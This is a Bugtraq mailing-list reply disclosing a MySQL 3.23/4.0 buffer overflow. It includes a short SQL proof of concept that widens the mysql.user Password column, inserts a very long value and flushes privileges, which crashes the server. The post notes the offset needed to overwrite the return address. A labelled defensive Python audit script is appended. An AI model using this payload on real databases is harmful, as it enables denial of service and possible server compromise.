Bugtraq mailing list archives
Re: Buffer overflow in MySQL
From: Konstantin Tsolov <ktsolov () etel bg>
Date: Thu, 11 Sep 2003 13:41:29 +0300
Managed to replicate on 4.0.13 (custom made) running on slack8.1 with mysql.mysql. 3.23.51 (the distro mysql version) also proved vulnerable. NB: just make sure you have a backup copy of your mysql db when testing this harmless proof of concept on your production server :-)

Successful exploitation of that bug is trivial on some platforms. On most Linux systems the return address needs about 444 bytes to get overwritten.

Harmless proof of concept:

> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password = '123456781234567812345678123456781234567812345678123456781234567812345678 123456781234567812345678123456781234567812345678123456781234567812345678 123456781234567812345678123456781234567812345678123456781234567812345678 12345678123456781234567812345678...' WHERE User = 'abcd';
> FLUSH PRIVILEGES;

[Connection lost]
--
"Talk is cheap because supply always exceeds demand." -- source unknown

+------------------------------------------------------+
| Konstantin Tsolov            ktsolov at etel dot bg  |
| Systems Administrator - VoIP                         |
| eTel Ltd.                             www.etel.bg    |
| Sofia, Bulgaria                                      |
+------------------------------------------------------+
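A defender-side audit of the precondition the post relies on (a Password column widened beyond its declared size, and rows holding values far longer than a stored hash), written as an added example; it is not code from the post or from MySQL, and the 16-character hash width it defaults to is an assumption about pre-4.1 grant tables, adjustable via max_len.

```python
"""Audit a dumped mysql.user definition and its rows for over-long Password values.

Added example; not code from the post or from MySQL. Assumption: before
MySQL 4.1 the scrambled password in mysql.user.Password is 16 chars wide.
"""
import re

# Constructed sample: the user table after the ALTER in the post, plus two rows.
SAMPLE_CREATE = (
    "CREATE TABLE user (Host char(60), User char(16), Password longtext, "
    "Select_priv enum('N','Y'))"
)
SAMPLE_ROWS = [
    ("root", "localhost", "5d2e19393cc5ef67"),   # 16-char hash (constructed)
    ("abcd", "localhost", "12345678" * 56),      # 448 chars, like the PoC value
]

# Matches "Password <type>" in a CREATE TABLE statement, with or without backticks.
_COL_RE = re.compile(r"`?Password`?\s+([A-Za-z]+(?:\(\d+\))?)", re.IGNORECASE)


def password_column_type(create_sql: str):
    """Return the declared type of the Password column (lowercased), or None."""
    m = _COL_RE.search(create_sql)
    return m.group(1).lower() if m else None


def column_is_bounded(col_type, max_len: int = 16) -> bool:
    """True only for char/varchar with a declared width no larger than max_len."""
    if col_type is None:
        return False
    m = re.fullmatch(r"(\w+)(?:\((\d+)\))?", col_type)
    base, width = m.group(1), m.group(2)
    return base in ("char", "varchar") and width is not None and int(width) <= max_len


def audit_user_rows(rows, max_len: int = 16):
    """Return (user, host, length) for each row whose Password exceeds max_len."""
    return [(u, h, len(p)) for u, h, p in rows if len(p) > max_len]


def audit(create_sql: str, rows, max_len: int = 16):
    """Combine the schema check and the row check into a list of findings."""
    findings = []
    col_type = password_column_type(create_sql)
    if not column_is_bounded(col_type, max_len):
        findings.append(f"Password column type is {col_type!r}, expected char({max_len})")
    for user, host, length in audit_user_rows(rows, max_len):
        findings.append(f"{user}@{host}: Password is {length} chars (> {max_len})")
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_CREATE, SAMPLE_ROWS):
        print(line)
```

Run it against the output of SHOW CREATE TABLE and a SELECT of User, Host, Password before issuing FLUSH PRIVILEGES; an empty result means neither the column nor any row has drifted from the expected width.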
Current thread:
- Buffer overflow in MySQL Jedi/Sector One (Sep 10)
- Re: Buffer overflow in MySQL Konstantin Tsolov (Sep 12)